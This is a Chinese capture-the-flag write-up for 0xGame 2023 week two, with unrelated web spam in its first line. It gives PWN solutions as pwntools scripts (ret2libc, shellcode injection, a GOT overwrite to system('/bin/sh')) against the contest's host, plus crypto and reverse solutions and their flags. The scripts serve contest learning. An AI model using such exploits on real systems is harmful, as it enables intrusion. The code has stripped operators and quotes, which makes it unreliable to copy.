clo3d代做网站,织梦淘宝客网站,网站建设需要矢量文件,网站制作计划书整理一下#xff0c;昨天该第二周了。今天应该9点结束提交#xff0c;等我写完就到了。
PWN
找不到且不对劲的flag
第1题是个nc测试#xff0c;但也不完全是#xff0c;因为flag在隐含目录里 高端的syscall 程序使用了危险函数#xff0c;并且没有canary阻止#xff0…
整理一下昨天该第二周了。今天应该9点结束提交等我写完就到了。
PWN
找不到且不对劲的flag
第1题是个nc测试但也不完全是因为flag在隐含目录里 高端的syscall 程序使用了危险函数并且没有canary阻止gets会形成溢出。并且有后门直接溢出到后门即可但是这个题不清楚哪作错了确一直打不通syscall最后只能用才办公先泄露libc再system(bin/sh)
from pwn import *#p process(./ret2syscall)
p remote(8.130.35.16, 51004)
context(archamd64, log_leveldebug)elf ELF(./ret2syscall)
pop_rdi 0x00000000004012e3 # pop rdi ; ret
pop_rsi 0x00000000004012e1 # pop rsi ; pop r15 ; ret
set_rax 0x401196
syscall 0x4011ae
bss 0x404800 #gdb.attach(p, b*0x401273\nc)p.sendlineafter(bInput: \n, flat(0,0,bss, pop_rdi, elf.got[puts], 0x401258))libc_addr u64(p.recvuntil(b\x7f).ljust(8, b\x00)) - 0x84420
bin_sh libc_addr 0x1b45bd
system libc_addr 0x52290
print(f{ libc_addr :x})p.sendline(flat(0,0,0x404f00, pop_rdi, bin_sh, pop_rsi, 0,0, system))p.interactive() 永远进不去的后门
int __cdecl main(int argc, const char **argv, const char **envp)
{char buf[8]; // [rsp0h] [rbp-40h] BYREFint v5; // [rsp8h] [rbp-38h]bufinit();puts(Welcome to 0xGame2023!);puts(Tell me sth interesting, and I will give you what you want.);read(0, buf, 0x100uLL);if ( v5 % 2023 2023 )system(/bin/sh);elseputs(Not that interesting. Bye.);return 0;
}
由于模2023后不可能等于2023所以也就永远也不能直接进去不过可以通过溢出进去。这里通过看汇编得到system的地址再溢出即可
from pwn import *#p process(./ret2text)
p remote(8.130.35.16, 51002)
context(archamd64, log_leveldebug)p.sendafter(b.\n, b\x00*0x48 p64(0x401298))
p.interactive()
随便乱搞的shellcode
int __cdecl main(int argc, const char **argv, const char **envp)
{unsigned int v3; // eaxchar *buf; // [rsp8h] [rbp-8h]void (*bufa)(void); // [rsp8h] [rbp-8h]bufinit(argc, argv, envp);buf (char *)mmap((void *)0x20230000, 0x1000uLL, 7, 34, -1, 0LL);puts(Now show me your code:);read(0, buf, 0x100uLL);puts(Implementing security mechanism...);v3 time(0LL);srand(v3);bufa (void (*)(void))buf[rand() % 256];close(1);puts(Done!);bufa();return 0;
}
先生成一个可写可执行的段20230000然后读入shellcode并执行。
1这里的rand生成一个长度值会在这个值后执行。可以在前边补nop大概率命中成功
2close(1)关闭了标准输出这个可以在进入shell后执行 exec 10将输出重定向到0
3shellcode可以直接利用pwntools的shellcode.sh()生成
from pwn import *#p process(./ret2text)
p remote(8.130.35.16, 51003)
context(archamd64, log_leveldebug)p.sendafter(b:, asm(shellcraft.sh()).rjust(0x100, b\x90))p.sendline(bexec 10)
p.sendline(bcat flag)
p.interactive()
字符串和随机数
void __noreturn bot()
{int v0; // [rspCh] [rbp-14h] BYREFunsigned int v1; // [rsp10h] [rbp-10h]int v2; // [rsp14h] [rbp-Ch]unsigned int v3; // [rsp18h] [rbp-8h]char v4; // [rsp1Fh] [rbp-1h]puts(Welcome to SOC2023!.);printf(Name: );read(0, name, 0x20uLL);printf(Password: );read(0, pass, 0x20uLL);if ( !strncmp(name, admin, 5uLL) !strcmp(pass, 1s_7h1s_p9ss_7tuIy_sAf3?) ){printf(Welcome back, %s!\n, name);sleep(1u);printf(New email from %s, title: %s, 0xGame2023 admin, Env now up! Flag here!\n);printf(Wanna see it?);v4 getchar();if ( v4 y || v4 89 ){sleep(1u);puts(Warning! Security alert!);printf(Input the security code to continue: );v3 rand() ^ 0xD0E0A0D0;v2 rand() ^ 0xB0E0E0F;v1 (v2 ^ v3) % 0xF4240;__isoc99_scanf(%d, v0);if ( v1 v0 )printf(Email content: %s\n, flag);elseperror(Challenge fail! Abort!\n);}}else{perror(Credential verification failed!\n);}puts(See you next time!);exit(0);
}
程序先读入用户名和密码对式成功后需要猜一个随机数。 1在bss段里seed在name后且与name相邻并且name仅检查前5个字符name输入满0x20时与seed相边输出时可以泄露。
2pass输入完后要输入\0截断
3通过调用ctypes库运行rand函数得到密文
from pwn import *#p process(./ret2text)
p remote(8.130.35.16, 51001)
context(archamd64, log_leveldebug)from ctypes import *
clibc cdll.LoadLibrary(/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so)p.sendafter(bName: , badmin.ljust(0x20))
p.sendafter(bPassword: , b1s_7h1s_p9ss_7tuIy_sAf3?\x00)p.recvuntil(badmin.ljust(0x20))
seed u32(p.recv(4))clibc.srand(seed)
p.sendafter(bWanna see it?, bY)
v1 (clibc.rand() ^ clibc.rand() ^ 0xD0E0A0D0 ^ 0xB0E0E0F) % 0xF4240p.sendlineafter(bInput the security code to continue: , str(v1).encode())print(p.recvline())
p.interactive()
我后门呢
int __cdecl main(int argc, const char **argv, const char **envp)
{char buf[32]; // [rsp0h] [rbp-20h] BYREFbufinit();puts(There wont be shell for you!);puts(Now give me your input:);read(0, buf, 0x100uLL);if ( strlen(buf) 0x20 ){puts(No chance for you to overflow!);exit(1);}puts(See you next time!);return 0;
}
这个题应该算是pwn里的基础打法前边都是教学。这里有溢出先通过溢出获取libc 加载地址然后再回到原程序再执行 system(bin/sh)
from pwn import *#p process(./ret2text)
p remote(8.130.35.16, 51005)
context(archamd64, log_leveldebug)elf ELF(./ret2libc)
libc ELF(./libc.so.6)
pop_rdi 0x0000000000401333 # pop rdi ; ret
pop_rsi 0x0000000000401331 # pop rsi ; pop r15 ; ret
bss 0x404800p.sendafter(bNow give me your input:, b\x00*0x20 flat(bss, pop_rdi, elf.got[puts], elf.plt[puts], elf.sym[main]))
libc.address u64(p.recvuntil(b\x7f)[-6:].ljust(8, b\x00)) - libc.sym[puts]
print(f{libc.address :x})bin_sh next(libc.search(b/bin/sh\x00))p.sendafter(bNow give me your input:, b\x00*0x20 flat(bss, pop_rdi, bin_sh, pop_rsi, 0,0, libc.sym[system]))p.interactive()
got-it
程序有4项add,edit,show和trick(退出时执行)
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{int v3; // [rspCh] [rbp-4h] BYREFbufinit();while ( 1 ){menu();__isoc99_scanf(%d, v3);if ( v3 8227 )break;if ( v3 8227 ){if ( v3 4 ){puts(Thanks for using!);exit(0);}if ( v3 4 ){switch ( v3 ){case 3:edit();break;case 1:add();break;case 2:show();break;}}}}trick();
}
add在第n个list偏移处写8字节
int add()
{int v1; // [rspCh] [rbp-4h] BYREFprintf(Input student id: );__isoc99_scanf(%d, v1);if ( v1 15 )return puts(Invalid id!);printf(Input student name: );return read(0, list[8 * v1], 8uLL);
}
同理edit和show分别是写和显示editadd,trick则执行exit(/bin/sh)显然是要改got[exit]为system
void __noreturn trick()
{exit((int)/bin/sh);
}
漏洞点v1是有符号数但只检查15所以指针可以向前溢出
list位置是0x4040a0,前边是got表而且got表没有保护可以通过前溢出修改和show got表。 思路是先通过前溢出show got表得到libc然后将got[exit]改为system然后在退出循环后执行exit[/bin/sh]
from pwn import *#p process(./got-it)
p remote(8.130.35.16, 51006)
context(archamd64, log_leveldebug)elf ELF(./got-it)
libc ELF(./libc.so.6)def add(id, v):p.sendlineafter(b , b1)p.sendlineafter(bInput student id: , str(id).encode())p.sendafter(bInput student name: , v)def show(id):p.sendlineafter(b , b2)p.sendlineafter(bInput student id: , str(id).encode())add(0, b;/bin/sh)
show(-16)
p.recvuntil(bStudent name: )
libc.address u64(p.recvuntil(b\x7f).ljust(8, b\x00)) - libc.sym[printf]#gdb.attach(p, b*0x401477\nc)add(-11, p64(libc.sym[system]))p.sendlineafter(b , b8227)p.interactive()CRYPTO
Whats CBC?
from Crypto.Util.number import *
from secret import flag,keydef bytes_xor(a,b):a,bbytes_to_long(a),bytes_to_long(b)return long_to_bytes(a^b)def pad(text):if len(text)%8:return textelse:pad 8-(len(text)%8)text pad.to_bytes(1,big)*padreturn textdef Encrypt_CBC(text,iv,key):result btext pad(text)block[text[_*8:(_1)*8] for _ in range(len(text)//8)]for i in block:tmp bytes_xor(iv,i)iv encrypt(tmp,key)result ivreturn resultdef encrypt(text,key):result bfor i in text:result ((i^key)).to_bytes(1,big)return resultiv b11111111
enc (Encrypt_CBC(flag,iv,key))
print(fenc {enc})enc b\x8e\xc6\xf9\xdf\xd3\xdb\xc5\x8e8q\x10f7.5\x81\xcc\xae\x8d\x82\x8f\x92\xd9oD6h8.d\xd6\x9a\xfc\xdb\xd3\xd1\x97\x96Q\x1d{\\TV\x10\x11简单的CBC加密方法先生成一个iv然后每将加密都先用明文与iv异或后再作加密处理并将上一块的密文作为下一块的iv继续加密下一块。这里的加密比较简单就是个1字节的异或。
这里先用第1块爆破一下key得到143再解密
enc b\x8e\xc6\xf9\xdf\xd3\xdb\xc5\x8e8q\x10f7.5\x81\xcc\xae\x8d\x82\x8f\x92\xd9oD6h8.d\xd6\x9a\xfc\xdb\xd3\xd1\x97\x96Q\x1d{\\TV\x10\x11from pwn import xor v xor(enc[:8], b1)
for i in range(256):print(i, xor(v,bytes([i])))key 143
for i in range(8, len(enc),8):print(xor(enc[i-8:i], xor(bytes([key]),enc[i:i8])))#0xGame{098f6bcd4621d373cade4e832627b4f6}
密码觅码先有*再密
from secret import flag #从中导入秘密的flag这是我们要破解的信息
from Crypto.Util.number import bytes_to_long #从函数库导入一些编码函数
from base64 import b64encode#hint:也许下列函数库会对你有些帮助但是要怎么用呢……
from base64 import b64decode
from gmpy2 import iroot
from Crypto.Util.number import long_to_bytesflag flag.encode()
lent len(flag)
flag [flag[i*(lent//4):(i1)*(lent//4)] for i in range(4)]#将flag切割成四份c1 bytes_to_long(flag[0])
c2 .join([str(bin(i))[2:] for i in flag[1]])
c3 b64encode(flag[2])
c4 flag[3].hex()
print(fc1? {pow(c1,5)}\nc2 {c2}\nc3 {c3}\nc4 {c4})
c1? 2607076237872456265701394408859286660368327415582106508683648834772020887801353062171214554351749058553609022833985773083200356284531601339221590756213276590896143894954053902973407638214851164171968630602313844022016135428560081844499356672695981757804756591891049233334352061975924028218309004551
c2 10010000100001101110100010100111101000111110010010111010100001101110010010111111101000011110011010000001101011111110011010011000101011111110010110100110100000101110010010111101100101011110011110111100
c3 blueggeeahO8jOmCoS5iOW8gOWniaIkQ
c4 e4bbace79a8443727970746fe68c91e68898e590a72121217d#全是乱码那咋办嘛python要调用很多库这题也是对一些库函数的测试。
分4段进行加密1是转整再5次幂2是转二进制3是base644是16进制最后合起来是乱码bytes转str用utf-8(默认值) e1 long_to_bytes(iroot(c1,5)[0])e2 bytes([int(c2[i:i8],2) for i in range(0, len(c2),8)])e3 b64decode(c3)e4 bytes.fromhex(c4)
m e1e2e3e4m.decode()
0xGame{ 恭喜你,已经理解了信息是如何编码的那么开始我们的Crypto挑战吧!!!}Take my bag!
一看吓我一跳入门怎么会有这个。再看一下这个包很小没有取模c显然比n小很多flag没那么长所以只用到序列的小的部分。
from Crypto.Util.number import *
from secret import flagdef encrypt(m):m str(bin(m))[2:][::-1]enc 0for i in range(len(m)):enc init[i] * int(m[i]) % nreturn encw getPrime(64)
n getPrime(512)
init [w*pow(3, i) % n for i in range(512)]c encrypt(bytes_to_long(flag))print(fw{w})
print(fn{n})
print(fc{c})
w16221818045491479713
n9702074289348763131102174377899883904548584105641045150269763589431293826913348632496775173099776917930517270317586740686008539085898910110442820776001061
c4795969289572314590787467990865205548430190921556722879891721107719262822789483863742356553249935437004378475661668768893462652103739250038700528111先生成一个逐渐增加的序列每一项都大于前面项的和。分解与每一位0/1相乘取和。解密方法就是从大向小够减就是1减掉不够减就是0
init [w*pow(3, i) % n for i in range(512)]m
for v in init[::-1]:if cv:m1c-v else:m0flag
for i in range(0, len(m), 8):flag chr(int(m[i:i8],2))#0xGame{Welc0me_2_Crypt0_Gme!#$%}
BabyRSA
RSA的入门题n由小素数组成可以很容易分解。
from Crypto.Util.number import *
from random import getrandbits
from secret import flagdef getN():N 1for i in range(16):tmp getPrime(32)N * tmpreturn Nmask getrandbits(256)
e 65537
n getN()
m bytes_to_long(flag)
c pow(m*mask,e,n)
print(fn {n})
print(fe {e})
print(fc {c})
print(fmask {mask})
n 93099494899964317992000886585964221136368777219322402558083737546844067074234332564205970300159140111778084916162471993849233358306940868232157447540597
e 65537
c 54352122428332145724828674757308827564883974087400720449151348825082737474080849774814293027988784740602148317713402758353653028988960687525211635107801
mask 54257528450885974256117108479579183871895740052660152544049844968621224899247这个题可以先分解n然后求phi这里我直接用sage里有euler_phi求因为n由小素数组成虽然是入门题怎么打都可以。但如果玩CTF走到密码这个方向sagemath是绕不过去的。
mm pow(c, inverse_mod(e, euler_phi(n)), n)
m int(mm) // mask
from Crypto.Util.number import long_to_bytes
long_to_bytes(int(m)//mask)
b0xGame{Magic_Mth_Make_Crypt0}
猜谜
from secret import flag,key
from Crypto.Util.number import *def dec(text):text text.decode()code AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLSunpad 0tmp if (text[-1] ) (text[-2:] ! ):text text[:-1]unpad -1if text[-2:] :text text[:-2]unpad -2for i in text:tmp str(bin(code.index(i)))[2:].zfill(3)tmp tmp[:unpad]result long_to_bytes(int(tmp,2))return resultdef enc(text):code AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLStext .join([str(bin(i))[2:].zfill(8) for i in text])length len(text)pad bif length%3 1:text 00pad belif length%3 2:text 0pad bresult [code[int(text[3*i:3*(i1)],2)] for i in range(0,len(text)//3)]return .join(result).encode()paddef encrypt(flag):result bfor i in range(len(flag)):result (key[i%7]^(flag[i]i)).to_bytes(1,big)return resultc enc(encrypt(flag))
print(fc {c})
这里的flag先通过encrypt再作encencrypt里与key异或由于flag头部已知可以直接求出key.
enc远远看上去像变列的base64但这里只用的2进制的3位查表这是个变表的8进制。在这里意思不大只需要再转回2进制再转bytes就行了。
code AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLS
c IPxYIYPYXPAn3nXX3IXA3YIAPn3xAYnYnPIIPAYYIA3nxxInXAYnIPAIxnXYYYIXIIPAXn3XYXIYAA3AXnx
m .join([bin(code.index(i))[2:].zfill(3) for i in c])
v bytes([int(m[i:i8],2) for i in range(0, len(m),8)])flag b0xGame{
key xor(v[:7], bytes([iflag[i] for i in range(7)]))
v2 xor(v, key)
m bytes([v-i for i,v in enumerate(v2)])
#0xGame{Kn0wn_plintext_Attck!}
Vigenere
密文0dGmqk{79ap4i0522g0a67m6i196he52357q60f} 古老而神秘的加密方式
维吉尼亚密码可以通过头来爆破key REVERSE 数字筑基
前两天有个网友说大部分逆向都可以通过grep得到确实这里的几题给了些误解。 代码金丹 网络元婴 虚拟化神 v3先被填充密文然后与0xGame异或最后与明文比较。这块grep一年也出不来的。
a bytes.fromhex(0000000000004B1B7E070E01084B234C085707196A55585309557F030C541D4E)
a p32(0x50585475) p32(0x2234E52) p32(0x553045B)
key b0xGame
xor(a,key)
#0xGame{c9fcd83d-e27a-4569-8ba1-62555b6dc6ac} 赛博天尊
int __cdecl main(int argc, const char **argv, const char **envp)
{__int64 v3; // rax__int64 v4; // rdxchar *v5; // rcx__int64 v7; // [rsp40h] [rbp-148h]__int64 v8; // [rsp48h] [rbp-140h]__int64 v9; // [rsp50h] [rbp-138h]__int64 v10; // [rsp58h] [rbp-130h]__int64 v11; // [rsp60h] [rbp-128h]char Buffer[256]; // [rsp70h] [rbp-118h] BYREFsub_140001020((char *)Format);sub_140001080(%s);v3 -1i64;dov3;while ( Buffer[v3] );if ( v3 ! 44|| Buffer[43] ! 125|| (sub_1400010E0(Buffer, 0xGame{%16llx-%16llx-%16llx-%16llx-%16llx}),7 * v9 5 * (v8 v11) 2 * (v10 4 * v7) ! 0x12021DE669FC2i64)|| (v4 v9 v10 2 * v10 2 * (v11 v7), v8 2 * v4 v4 ! 0x159BFFC17D045i64)|| v10 v9 v11 2 * v9 2 * (v9 v11 2 * v9) 2 * (v8 4 * v7) ! 0xACE320D12501i64|| v8 2 * (v7 v11 v9 2 * v10) ! 0x733FFEB3A4FAi64|| (v5 (char *)unk_1400032B8, v8 7 * v11 8 * (v9 v10) 5 * v7 ! 0x1935EBA54EB28i64) ){v5 (char *)byte_1400032D8;}sub_140001020(v5);system(pause);return 0;
}
这里符号表都被删掉了从函数的参数猜测函数功能。flag由5个数字组成这些数符合下边的运算。
z3也是绕不过去了。
7 * v9 5 * (v8 v11) 2 * (v10 4 * v7) ! 0x12021DE669FC2i64)|| (v4 v9 v10 2 * v10 2 * (v11 v7), v8 2 * v4 v4 ! 0x159BFFC17D045i64)|| v10 v9 v11 2 * v9 2 * (v9 v11 2 * v9) 2 * (v8 4 * v7) ! 0xACE320D12501i64|| v8 2 * (v7 v11 v9 2 * v10) ! 0x733FFEB3A4FAi64|| (v5 (char *)unk_1400032B8, v8 7 * v11 8 * (v9 v10) 5 * v7 ! 0x1935EBA54EB28i64) )
from z3 import *v7,v8,v9,v10,v11 Ints(v7 v8 v9 v10 v11)s Solver()
s.add(7 * v9 5 * (v8 v11) 2 * (v10 4 * v7) 0x12021DE669FC2)
v4 v9 v10 2 * v10 2 * (v11 v7)
s.add(v8 3*v4 0x159BFFC17D045)
s.add(v10 v9 v11 2 * v9 2 * (v9 v11 2 * v9) 2 * (v8 4 * v7) 0xACE320D12501)
s.add(v8 2 * (v7 v11 v9 2 * v10) 0x733FFEB3A4FA)
s.add(v8 7 * v11 8 * (v9 v10) 5 * v7 0x1935EBA54EB28)
s.check()d s.model()v11 63356652901730
v9 16488
v7 2693650760
v8 14810
v10 41791-.join([hex(i)[2:] for i in [v7,v8,v9,v10,v11]])
#0xGame{a08dd948-39da-4068-a33f-399f5eca5562}
还是写的晚了到这web和misc的题都看不到了。反正这块也不是本行题都是一点点搜着网上的例子作。都是入门题网上都能搜着作法。
